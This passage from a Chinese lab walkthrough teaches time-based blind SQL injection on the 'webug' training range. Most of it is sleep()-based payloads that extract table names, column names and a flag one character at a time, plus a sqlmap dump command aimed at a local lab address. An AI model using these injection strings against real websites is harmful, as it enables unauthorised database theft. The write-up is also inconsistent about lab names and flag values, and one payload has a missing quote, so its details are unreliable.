爆出数据库第2个表格长度
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=1,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=2,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=3,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=4,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=5,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=6,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=7,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=8,sleep(5),1)%23 #成功
如上所示第2个表格长度为8,可以求的websec数据库的每个表长度,分别9、8、8、4·、12、4、9
(6)获取当前数据库的表名
第一个表格的名字,如下所示为data_crud
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))='d',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))='a',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))='t',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=a',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))='_',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))='c',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))='r',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))='u',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),9,1))='d',sleep(5),1)%23 
第二个表名为env_list,注入命令如下所示
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))='e',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))='n',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))='v',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))='_',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))='l',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),6,1))='i',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),7,1))='s',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),8,1))='t',sleep(5),1)%23
以此类推,所有表名分别为data_crud,env_list,env_path,flag,sqlinjection,user,user_test
(7)获取env_list表的列名
如下所示,列长度为2
id=1' and if((select length(column_name) from information_schema.COLUMNS where TABLE_NAME='env_list' limit 0,1) =1,sleep(5),1)%23
id=1' and if((select length(column_name) from information_schema.COLUMNS where TABLE_NAME='env_list' limit 0,1) =2,sleep(5),1)%23
第一列的列名注入命令为
id=1' and if(mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME ='env_list' limit 0,1),1,1)='i',sleep(5),1)%23
id=1' and if(mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME ='env_list' limit 0,1),2,1)='d',sleep(5),1)%23如下可知第1列的列名为id
以此类推,可以获取所有列的名称,分别为id,envName,envDesc,envIntegration,delFlag,envFlag,level,type
(8)获取env_list的所有字段
如下获取env_list表flag列的第一个字段,如下所示为dfafdasfafdsadfa
id=1' and if((substr((select flag from flag limit 0,1),1,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),2,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),3,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),4,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),5,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),6,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),7,1))='s',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),8,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),9,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),10,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),11,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),12,1))='s',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),13,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),14,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),15,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),16,1))='a',sleep(5),1)%23时间注入相对耗时,建议使用bp半自动化或者sqlmap或者python脚本进行注入,如下所示,最后获取到的flag信息如下所示
第三关的flag为gfdgdfsdg
3.sqlmap渗透
(1)bp抓包保存
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1bp抓包并将报文保存为webug02.txt
(2)sqlmap注入
由于第03关与第02关源码一样,故而可以这里使用webug02.txt进行注入,完整交互如下
为了区分,这里可以加上--tech T命令
sqlmap -r webug02.txt --current-db --batch --tech T -D webug -T env_list --dump如下找到SQL盲注点
(3)获取flag
如下所示,flag为gfdgdfsdg
获取的flag为
Flag: gfdgdfsdg实际上时间注入非常慢且耗时过久,建议可以通过较快的方法实现注入就不要用时间盲注法,这里只是使用--current-db 参数获取数据库即可
总结
SQL注入主要分析几个内容
(1)闭合方式是什么?webug靶场的第02关关卡为字符型,闭合方式为单引号
(2)注入类别是什么?这部分是普通的字符型GET注入,可以使用时间型盲注,使用union法即可注入成功,也可以使用相对复杂的布尔注入方法
(3)是否过滤了关键字?很明显通过源码,iwebsec的第02关和第03关卡没有进行任何过滤
了解了如上信息就可以针对性使用SQL注入法进行渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的webug靶场第02关和第03关注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。不过能用简单的方法注入成功,都不建议使用复杂的方法进行注入啊,否则是真的费时费力啊。